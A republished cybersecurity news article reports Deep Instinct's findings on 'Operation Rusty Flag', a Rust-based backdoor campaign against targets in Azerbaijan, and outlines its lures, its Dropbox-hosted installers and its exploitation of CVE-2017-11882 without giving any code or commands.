Facebook Twitter Instagram
    • Privacy Policy
    • Contact Us
    Facebook Twitter Instagram Pinterest Vimeo
    AI Home SecurityAI Home Security
    • Home
    • Home Security
    • Cyber Security
    • Biometric Technology
    Contact
    AI Home SecurityAI Home Security
    Cyber Security

    Azerbaijan Targeted in New Rust-Based Malware Campaign

    justmattgBy justmattgSeptember 19, 2023No Comments3 Mins Read

    [ad_1]

    Sep 19, 2023THNCyber Attack / Threat Intel

    Rust-Based Malware

    Targets located in Azerbaijan have been singled out as part of a new campaign that’s designed to deploy Rust-based malware on compromised systems.

    Cybersecurity firm Deep Instinct is tracking the operation under the name Operation Rusty Flag. It has not been associated with any known threat actor or group.

    “The operation has at least two different initial access vectors,” security researchers Simon Kenin, Ron Ben Yizhak, and Mark Vaitzman said in an analysis published last week. “One of the lures used in the operation is a modified document that was used by the Storm-0978 group. This could be a deliberate ‘false flag.'”

    Cybersecurity

    The attack chain leverages an LNK file named 1.KARABAKH.jpg.lnk as a launchpad to retrieve a second-stage payload, an MSI installer, hosted on Dropbox.

    The installer file, for its part, drops an implant written in Rust, an XML file for a scheduled task to execute the implant, and a decoy image file that features watermarks of the symbol of the Azerbaijan Ministry of Defense.

    An alternate infection vector is a Microsoft Office document named “Overview_of_UWCs_UkraineInNATO_campaign.docx,” which exploits CVE-2017-11882, a six-year-old memory corruption vulnerability in Microsoft Office’s Equation Editor, to invoke a Dropbox URL hosting a different MSI file serving a variant of the same Rust backdoor.

    The use of Overview_of_UWCs_UkraineInNATO_campaign.docx is noteworthy, as a lure with the same filename was leveraged by Storm-0978 (aka RomCom, Tropical Scorpius, UNC2596, and Void Rabisu) in recent cyber attacks targeting Ukraine that exploit an Office remote code execution flaw (CVE-2023-36884).

    UPCOMING WEBINAR

    Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM

    Stay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.

    Supercharge Your Skills

    “This action looks like a deliberate false flag attempt to pin this attack on Storm-0978,” the researchers said.

    The Rust backdoor, one of which masquerades as “WinDefenderHealth.exe,” comes fitted with capabilities to gather information from the compromised host and send it to an attacker-controlled server.

    The exact end goals of the campaign remain unclear at this stage. At the same time, the possibility that it could be a red team exercise has not been discounted.

    “Rust is becoming more popular among malware authors,” the researchers said. “Security products are not yet detecting Rust malware accurately, and the reverse engineering process is more complex.”

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.



    [ad_2]

    Source link

    Previous ArticleNew AMBERSQUID Cryptojacking Operation Targets Uncommon AWS Services
    Next Article National ID Returns to Somalia, Backed By Biometrics – Identity News Digest
    justmattg
    • Website

    Related Posts

    Cyber Security

    Name That Toon: Last Line of Defense

    April 16, 2024
    Cyber Security

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024
    Cyber Security

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024
    Add A Comment

    Leave A Reply Cancel Reply

    Facebook Twitter Instagram Pinterest
    • Privacy Policy
    • Contact Us
    AI Home Security © 2025 All rights reserved | Designed By ESmartsSolution

    Type above and press Enter to search. Press Esc to cancel.

    ↑